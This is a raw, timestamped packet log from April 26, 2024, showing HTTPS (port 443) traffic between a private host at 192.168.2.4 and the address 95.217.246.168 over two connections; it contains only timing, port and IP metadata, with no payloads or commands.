Apr 26, 2024 11:03:19.482949972 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.482966900 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.483057022 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.483067036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.483130932 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.488281965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.488297939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.488389969 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.488399982 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.488436937 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.493283033 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.493295908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.493386030 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.493396044 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.493441105 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.499001026 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.499015093 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.499074936 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.499084949 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.499130964 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.503880978 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.503895044 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.503954887 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.503964901 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.504003048 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.509401083 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.509422064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.509457111 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.509465933 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.509515047 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.513511896 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.513524055 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.513585091 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.513595104 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.513628006 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.518882036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.518898010 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.518949032 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.518959045 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.518994093 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.519016027 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.523861885 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.523874998 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.523912907 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.523922920 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.523952007 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.523977995 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.529617071 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.529628992 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.529665947 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.529673100 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.529694080 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.529721022 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.535598993 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.535610914 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.535667896 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.535682917 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.535722971 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.540189028 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.540210962 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.540268898 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.540278912 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.540340900 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.542104959 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.542117119 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.542179108 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.542186022 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.542227983 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.548367023 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.548379898 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.548491001 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.548521042 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.548566103 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.553644896 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.553658009 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.553729057 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.553742886 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.553806067 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.556210041 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.556225061 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.556294918 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.556307077 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.556360006 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.560785055 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.560797930 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.560866117 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.560877085 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.560952902 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.565212965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.565227985 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.565275908 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.565294027 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.565324068 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.565359116 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.568763018 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.568775892 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.568810940 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.568865061 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.568876028 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.569058895 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.572722912 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.572736025 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.572802067 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.572813034 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.572863102 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.576574087 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.576586008 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.576652050 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.576662064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.576715946 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.581087112 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.581099033 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.581163883 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.581173897 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.581229925 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.586561918 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.586575031 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.586641073 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.586652040 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.586707115 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.589157104 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.589170933 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.589234114 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.589245081 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.589304924 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.592958927 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.592971087 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.593038082 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.593048096 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.593107939 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.597433090 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.597445965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.597508907 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.597520113 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.597575903 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.600930929 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.600949049 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.601025105 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.601037025 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.601088047 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.604789972 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.604804993 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.604867935 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.604877949 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.604931116 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.608128071 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.608140945 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.608207941 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.608218908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.608273029 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.612485886 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.612499952 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.612684965 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.612700939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.612761974 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.616127014 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.616142035 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.616223097 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.616235018 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.616262913 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.616292000 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.619410038 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.619421959 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.619499922 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.619512081 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.619565964 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.624073029 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.624085903 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.624146938 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.624159098 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.624231100 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.627417088 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.627429962 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.627497911 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.627509117 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.627557039 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.630207062 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.630220890 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.630294085 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.630304098 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.630356073 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.634321928 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.634335041 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.634402037 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.634413958 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.634473085 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.637679100 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.637693882 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.637742996 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.637753963 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.637809038 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.640856981 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.640872002 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.640940905 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.640953064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.641005993 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.646389961 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.646403074 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.646466017 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.646476984 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.646526098 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.650010109 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.650023937 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.650087118 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.650098085 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.650151014 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.654767036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.654779911 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.654844999 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.654855967 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.654911995 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.656907082 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.656923056 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.656986952 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.656996965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.657059908 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.659149885 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.659162045 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.659225941 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.659236908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.659285069 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.662122011 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.662133932 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.662199974 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.662209988 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.662261963 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.665806055 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.665827990 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.665884018 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.665895939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.665950060 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.670033932 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.670047045 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.670109987 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.670120955 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.670171976 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.673477888 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.673494101 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.673556089 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.673567057 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.673616886 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.678031921 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.678049088 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.678122997 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.678133965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.678181887 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.682329893 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.682343006 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.682409048 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.682420015 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.682471991 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.684729099 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.684741974 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.684803009 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.684813023 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.684859991 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.689234018 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.689245939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.689311028 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.689337969 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.689382076 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.691241026 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.691252947 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.691314936 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.691325903 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.691379070 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.695612907 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.695628881 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.695686102 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.695698023 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.695748091 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.697264910 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.697277069 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.697371960 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.697381973 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.697419882 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.699666977 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.699680090 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.699740887 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.699752092 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.699801922 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.702856064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.702904940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.702935934 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.702936888 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.702960014 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.702986002 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.703597069 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.703627110 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.829895973 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.829988003 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.830082893 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.830343008 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.830375910 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:20.365291119 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:20.365386963 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:20.365958929 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:20.365988016 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:20.366169930 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:20.366182089 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204581976 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204691887 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204709053 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.204763889 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204801083 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204804897 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.204843044 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.204857111 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.204885960 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.204931974 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.325483084 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.325541973 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.325579882 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.325603008 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.325622082 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.325650930 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.510488987 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.510579109 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.510593891 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.510621071 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.510658979 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.510683060 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.619692087 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.619736910 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.619781017 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.619807005 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.619823933 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.619853020 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.713653088 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.713701010 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.713738918 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.713768005 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.713793993 CEST	49751	443	192.168.2.4	95.217.246.168
